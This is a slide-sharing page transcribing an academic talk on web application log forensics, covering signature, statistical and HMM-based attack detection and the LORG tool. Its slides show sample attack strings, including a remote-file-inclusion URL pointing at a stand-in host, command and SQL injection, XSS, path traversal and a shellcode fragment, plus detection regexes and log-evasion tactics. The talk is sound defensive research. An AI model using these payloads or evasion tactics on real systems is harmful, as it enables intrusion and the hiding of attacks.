web application forensics
play

Web Application Forensics HTTPD Logfile Security Analysis Jens - PowerPoint PPT Presentation

Mar 04, 2024 •583 likes •873 views

Web Application Forensics HTTPD Logfile Security Analysis Jens Mller, Ruhr University Bochum jens.a.mueller@rub.de Scenario You got pwned The Log File Problem Log files are huge. We are lazy. How find important stuff? Still

  1. Web Application Forensics HTTPD Logfile Security Analysis Jens Müller, Ruhr University Bochum jens.a.mueller@rub.de

  2. Scenario You got pwned

  3. The Log File Problem ● Log files are huge. We are lazy. ● How find „important“ stuff? ● Still using grep/sed/awk? ● Why not use automated tools? ● Because we're simply lacking them right now!

  4. What do we have? Log Analytics, Monitoring, WAF/IDS Forensics Automated ● ModSecurity ● Piwik Web Log ● OWASP AppSensor ● AWstats Forensics ● PHPIDS ● GoAccess ● ... ● Splunk ● PyFlag ● ... Why not combine both worlds?

  5. Needle in a Haystack? 134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140 134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745 134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219 134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141

  6. Various Kinds of Attacks... Remote File Inclusion: /include/?file= http://evil.fr/sh ● Command Execution: /lookup.jsp?ip= |+ls+-l ● SQL Injection: /product.asp?id=0%20 or %20 1=1 ● XSS (persistent): /forum.php?post= <script>alert(1); ● Buffer Overflow: /cgi-bin/Count.cgi?user=a ● \x90\xbf8\xee\xff\xbf8\xee\xff \xbf8\xee\xff\xbf8\xee\xff\xbf8 \xee\xff\xbf8 […] \xff\xff ...and many more ●

  7. Attack Detection ● Two approaches: signature-based vs. learning-based ● Used Detection Modules : → Match against Regular Expressions („ PHPIDS“ ) → Statistics based on Char Distribution („ CHARS“ ) → Machine Learning based on HMM („ MCSHMM“ )

  8. Signatures + Regular Expressions ● Signatures : [ADD00] ● RegEx : [MC08], [Hei08] , [Fry11] PHPIDS detection module: query values → → Result Array of URL De-Obfuscation, Centrifuge Magic, RegEx Matching

  9. Basic Statistics ● Length : [KV03] ● Char Distribution : [KV03] , [WS04] CHARS detection module: _____ μ |special chars| P = |special chars| (Probability of an URL query value beeing benign)

  10. Machine Learning ● Bayes Estimatior : [CC04] ● Self-Organizing Maps : [VMV05], [Ste12] ● DFA : [ISBF07] ● Neural Networks : [GER09] ● Wavelet Transformations : [MdAN+ 11] ● N-grams : [Oza13] ● Hidden Markov Models : [CAG09] , [AG10], [AG11], [HTS11], [GJ12], [Choi13]

  11. Hidden Markov Models MCSHMM detection module: ● Aggregation : build Ensemble of HMMs for every URL query string parameter of every web application (=path) ● Conversion : Values [a-Z] → 'A', [0-9] → 'N' ● Training Phase : Baum-Welch algorithm ● Testing Phase : Viterbi algorithm (returns Probability of an URL query value like „ /etc/passwd “ beeing benign) ● Apply MCS : Ensemble's highest Probability → best Result

  12. Evaluation: Detection Modules ● Training Data: www.nds.rub.de , three weeks logs ● 63.000 requests altogether / 4.000 requests per day ● All incoming web traffic pre-filtered by a firewall with IPS ● considered attack free (in terms of measuring false-positives) ● Test Data: 40 real-world exploits obtained from various sources (9 command execution, 9 LFI, 9 XSS/CSRF, 13 SQLi) ● payloads placed in five URL query values of two web apps ● using HTTP GET method for payload injection only!

  13. Evaluation: Detection Modules ROC-Kurve for www.nds.rub.de

  14. The Missing Context... Detection completed, still to much Data! ● Information about the Attacker → Group Activities into Sessions → Man-Machine Distinction → GeoIP, DNSBL Lookups ● Information about the Attack → Success Evaluation?

  15. Man-machine Distinction ● Session Identification ● Types of Sessions → Random Scan? (least dangerous) → Targeted Scan? (more dangerous) → Human Attacker? (most dangerous) ● Related to Robot Detection Techniques

  16. Man-machine distinction

  17. Geomapping Visitors and Attacks

  18. DNSBL Information What info can be gathered about attackers' origins? ● Wanted for Spam (b.barracudacentral.org, spam.dnsbl.sorbs.net, sbl.spamhaus.org) ● Botnet (xbl.spamhaus.org, zombie.dnsbl.sorbs.net) ● Open Proxies (dnsbl.proxybl.org, http.dnsbl.sorbs.net, socks.dnsbl.sorbs.net) ● Tor Network Exit Node (tor.dnsbl.sectoor.de)

  19. Success Evaluation ● Does yet another unsuccesful Scan matter? → No ● Did the attacker Succeed? → Define: What does „suceed“ mean? → Info Disclosure? File Disclosure? Compromise? ● Active Method: Replay Attacks, match for Signatures

  20. Active Replay of Attacks Signatures for File and Information Disclosure: File disclosure: UNIX /etc/passwd → ' root:x:0:0:.+:[0-9a-zA-Z/]+ ' File disclosure: PHP source code → ' <? ?php(.*)?> ' File disclosure: Private keys → ' -----BEGIN (D|R)SA PRIVATE KEY----- ' Info disclosure: PHP exception → ' PHP (Notice|Warning|Error) ' Info disclosure: Java IO exception → ' java.io.FileNotFoundException: ' Info disclosure: Python IO exception → ' Traceback (most recent call last): ' Info disclosure: file system path → ' Call to undefined function.*() in / ' Info disclosure: web root path → ' : failed to open stream: ' Info disclosure: MySQL error → ' DBD::mysql::(db|st)(.*)failed '

  21. Wait, active Methods are to easy... ● How to evaluate the Success of Attacks given Log File information alone ? 134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140 134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745 ● Any ideas?

  22. HTTP Response Codes 134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140 134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745 134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219 134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141

  23. HTTP Response Codes ...do not provide to much Information: ● 404 → unsuccessful scan? ● 401 | 403 → unsuccessful login ● 400 | 408 | 503 → denial of service? ● 500 → buffer overflow? ● 414 → unsuccessful buffer overflow?

  24. Bytes-sent Outliers ● What about this: Outliers in „bytes-sent“ field ● Problem: Dynamic Content might produce various Hotspots → we need a density-based Algorithm! ● Local outlier Factor (LoF) ● Experimental; produces a high false-positive Rate, but we do this only on Requests detected as Attacks...

  25. Outliers in bytes-sent 134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140 134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745 134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312 212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219 134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141

  26. Visualization: LORG in Action Nothing to see here, move on...

  27. Evasion Techniques + Unresolved Issues ● Attack-based → Training Data Poisoning: Mitigation of learning-based Detection → Payload Obfuscation (urlencode, UTF-7 Entities, JS Unicode, ...) → Use Attack Vectors not logged or not visible (POST, DOM-XSS) → Hide attack flow in various, separate Steps or in Mass of „Noise“ ● Logfile-based → Manipulation of Log Files (got r00t?) → Denial of Service Log Server (or send 0x1A to Apache 1.3) → Log Flooding: reach End of Disk or overwrite Logs (Rotation)

  28. Thanks for your Attention... Source Code ● LORG („ L ogfile O utlier R ecognition and G athering“) http://github.com/jensvoid/lorg (GPL2; pre-alpha PoC!) Questions?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

About this presentation : Learning : What is Digital Forensics ? Political : Digital

About this presentation : Learning : What is Digital Forensics ? Political : Digital

An introduction to digital forensics About this presentation : Learning : What is Digital Forensics ? Political : Digital Forensics and Open Sources licensing Tool time : Digital Forensics Framework Presented by Solal Jacob core dev.

444 views • 30 slides
CSN08101 Digital Forensics Lecture 1A: Introduction to Forensics Lecture 1A: Introduction to

CSN08101 Digital Forensics Lecture 1A: Introduction to Forensics Lecture 1A: Introduction to

CSN08101 Digital Forensics Lecture 1A: Introduction to Forensics Lecture 1A: Introduction to Forensics Module Leader: Dr Gordon Russell Lecturers: Robert Ludwiniak Digital Forensics You will learn in this module: The principals of

1.09k views • 34 slides
CSE 469: Computer and Network Forensics Topic 5: Image Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 5: Image Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 5: Image Forensics Dr. Mike Mabey | Spring 2019 CSE 469: Computer and Network Forensics Forensics for Graphics Files Types of graphics file formats Type of data compression How to locate

362 views • 25 slides
2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York

2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York

2015-2017 (c) P.Pale: Computer Forensics 2015-10-17 File System Forensics A New York computer forensics firm found that 40% of the hard disk drives it recently purchased in bulk orders on eBay contained personal, private and sensitive

884 views • 70 slides
Digital forensics and malware Digital forensics According to Wikipedia, you could be looking

Digital forensics and malware Digital forensics According to Wikipedia, you could be looking

Digital forensics and malware Digital forensics According to Wikipedia, you could be looking for: attribution, alibis and statements, intent, evaluation of source, document authentication File carving ( e.g. , bifragment gap carving)

630 views • 13 slides
CSE 469: Computer and Network Forensics Topic 7: Mobile Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 7: Mobile Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 7: Mobile Forensics Dr. Mike Mabey | Spring 2019 CSE 469: Computer and Network Forensics Overview of Mobile Forensics Originated in Europe and focused on the GSM SIM card. Roaming of Devices

694 views • 17 slides
Image Forensics of High Dynamic Range Imaging 10th International Workshop on Digital-Forensics

Image Forensics of High Dynamic Range Imaging 10th International Workshop on Digital-Forensics

Image Forensics of High Dynamic Range Imaging 10th International Workshop on Digital-Forensics &amp; Watermarking P. J. Bateman, A. T. S. Ho, and J. A. Briffa This research is sponsored by an EPSRC/Charteris CASE Award Image Forensics

703 views • 38 slides
Teaching digital forensics in a large class Teaching forensics at of students UL FRI

Teaching digital forensics in a large class Teaching forensics at of students UL FRI

Teaching digital forensics in a large class of students Teaching digital forensics in a large class Teaching forensics at of students UL FRI Generating customized disk images Gaper Fele-or University of Ljubljana, Faculty of

446 views • 23 slides
Android: forensics and reverse engineering Raphal Rigo - ANSSI 26/11/2010 Agence nationale de

Android: forensics and reverse engineering Raphal Rigo - ANSSI 26/11/2010 Agence nationale de

Android: forensics and reverse engineering Raphal Rigo - ANSSI 26/11/2010 Agence nationale de la A N S S I scurit des systmes dinformation Introduction Forensics: context Forensics: memory Forensics: filesystem Reverse

545 views • 36 slides
Digital Forensics for SSC Solvers Daniel Kouril EGI CSIRT Digital Forensics Methods to

Digital Forensics for SSC Solvers Daniel Kouril EGI CSIRT Digital Forensics Methods to

Digital Forensics for SSC Solvers Daniel Kouril EGI CSIRT Digital Forensics Methods to collect and analyze (digital) evidence Three basic phases Data collection, Analysis, Reporting Triage Various sources of information

307 views • 20 slides
Web Application Incident Response &amp; Forensics: A Whole New Ball Game! Chuck Willis

Web Application Incident Response &amp; Forensics: A Whole New Ball Game! Chuck Willis

Web Application Incident Response &amp; Forensics: A Whole New Ball Game! Chuck Willis chuck.willis@mandiant.com Rohyt Belani rohyt.belani@intrepidusgroup.com Black Hat Briefings DC 2007 February 28, 2007 Company Overviews MANDIANT

1.38k views • 69 slides
CSE 469: Computer and Network Forensics Topic 6: Email Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 6: Email Forensics Dr. Mike Mabey | Spring 2019

CSE 469: Computer and Network Forensics Topic 6: Email Forensics Dr. Mike Mabey | Spring 2019 CSE 469: Computer and Network Forensics Email System Components User agents / Webmail: Composing, editing, and reading mail messages. Mail

687 views • 49 slides
Preventive Digital Forensics: Creating Preventive Digital Forensics Systems to Proactively

Preventive Digital Forensics: Creating Preventive Digital Forensics Systems to Proactively

FloCon 2015 Conference January 15, 2015 Portland, Oregon Preventive Digital Forensics: Creating Preventive Digital Forensics Systems to Proactively Resolve Computer Security Incidents in Organizations JESUS RAMIREZ PICHARDO (PMP, GCFA,

333 views • 30 slides
CSE 469: Computer and Network Forensics Topic 8: Cloud and Web Forensics Dr. Mike Mabey | Spring

CSE 469: Computer and Network Forensics Topic 8: Cloud and Web Forensics Dr. Mike Mabey | Spring

CSE 469: Computer and Network Forensics Topic 8: Cloud and Web Forensics Dr. Mike Mabey | Spring 2019 CSE 469: Computer and Network Forensics What is The Cloud? A computing storage system that provides on-demand network access for

613 views • 25 slides
SQL SERVER Anti-Forensics Cesar Cerrudo Introduction Sophisticated attacks requires leaving

SQL SERVER Anti-Forensics Cesar Cerrudo Introduction Sophisticated attacks requires leaving

SQL SERVER Anti-Forensics Cesar Cerrudo Introduction Sophisticated attacks requires leaving as few evidence as possible Anti-Forensics techniques help to make forensics investigations difficult Anti-Forensics can be a never

657 views • 38 slides
Anti-Forensics: Techniques, Detection and Countermeasures Simson L. Garfinkel Naval Postgraduate

Anti-Forensics: Techniques, Detection and Countermeasures Simson L. Garfinkel Naval Postgraduate

Anti-Forensics: Techniques, Detection and Countermeasures Simson L. Garfinkel Naval Postgraduate School What is Anti-Forensics? Computer Forensics: Scientific Knowledge for collecting, analyzing, and presenting evidence to the courts

322 views • 15 slides
Incident Response and Forensics in your Pyjamas When security incidents happen, you often have to

Incident Response and Forensics in your Pyjamas When security incidents happen, you often have to

Incident Response and Forensics in your Pyjamas When security incidents happen, you often have to respond in a hurry to gather forensic data from the resources that were involved. You might need to grab a bunch of hard drives and physically visit

558 views • 28 slides
T and Science of Forensic Monitoring Has your boss just told you? You are our New Forensic

T and Science of Forensic Monitoring Has your boss just told you? You are our New Forensic

The T and Science of Forensic Monitoring Robert N. Baker, PhD Jeannie Cool, PCC-S Lottie Gray, MSSA, LISW, CDCA Julia King, PsyD, MBA T and Science of Forensic Monitoring Has your boss just told you? You are our New Forensic Monitor.

834 views • 70 slides
DFS / FCU METRICS CASEWORK Performed 809 exhibits for USAO/NSID/OCME/DOC o Superior Court (379

DFS / FCU METRICS CASEWORK Performed 809 exhibits for USAO/NSID/OCME/DOC o Superior Court (379

DFS / FCU METRICS CASEWORK Performed 809 exhibits for USAO/NSID/OCME/DOC o Superior Court (379 felony exhibits, 282 misdemeanor exhibits) o District Courts (47 exhibits) o District agencies &quot;Surveillance&quot; (98+ exhibits) FCU Reports for

159 views • 3 slides
Similarity of 2D images: An application to the forensic comparison of shoe outsole impressions

Similarity of 2D images: An application to the forensic comparison of shoe outsole impressions

Similarity of 2D images: An application to the forensic comparison of shoe outsole impressions Soyoung Park, Ph.D and Alicia Carriquiry,Ph.D CSAFE/Iowa State University March, 11,2019 1/29 Acknowledgements Thanks to, Dr. Hariharan K.

627 views • 29 slides
Topics in Security: Forensic Signal Analysis Markus Kuhn, Andrew Lewis Computer Laboratory

Topics in Security: Forensic Signal Analysis Markus Kuhn, Andrew Lewis Computer Laboratory

Fact or fiction? Topics in Security: Forensic Signal Analysis Markus Kuhn, Andrew Lewis Computer Laboratory http://www.cl.cam.ac.uk/teaching/0910/R08/ Michaelmas 2009 MPhil ACS Hans D. Baumann, DOCMA 3 Real Introductory examples:

491 views • 7 slides
The Bro Network Security Monitor Network Forensics with Bro Matthias Vallentin UC Berkeley /

The Bro Network Security Monitor Network Forensics with Bro Matthias Vallentin UC Berkeley /

The Bro Network Security Monitor Network Forensics with Bro Matthias Vallentin UC Berkeley / ICSI vallentin@icir.org Bro Workshop 2011 NCSA, Champaign-Urbana, IL Outline 1. The Bro Difference 2. Abstract Use Cases 3. From Post-Facto to

530 views • 23 slides
ForgetMeNot: Memory-Aware Forensic Facial Sketch Matching Authors: Ouyang, Hospedales, Song, Li

ForgetMeNot: Memory-Aware Forensic Facial Sketch Matching Authors: Ouyang, Hospedales, Song, Li

ForgetMeNot: Memory-Aware Forensic Facial Sketch Matching Authors: Ouyang, Hospedales, Song, Li Slides by Josh Kelle 1 Overview VIPSL dataset experiment goals experiment results conclusion 2 VIPSL Dataset artist A B C D

377 views • 22 slides
Master Boot Record (MBR) A Forensic Perspective Villanova University Department of

Master Boot Record (MBR) A Forensic Perspective Villanova University Department of

Master Boot Record (MBR) A Forensic Perspective Villanova University Department of Computing Sciences D. Justin Price Spring 2014 Master Boot Record Occupies the first 512-byte sector Boot Code Assembly Language

65 views • 6 slides

More recommend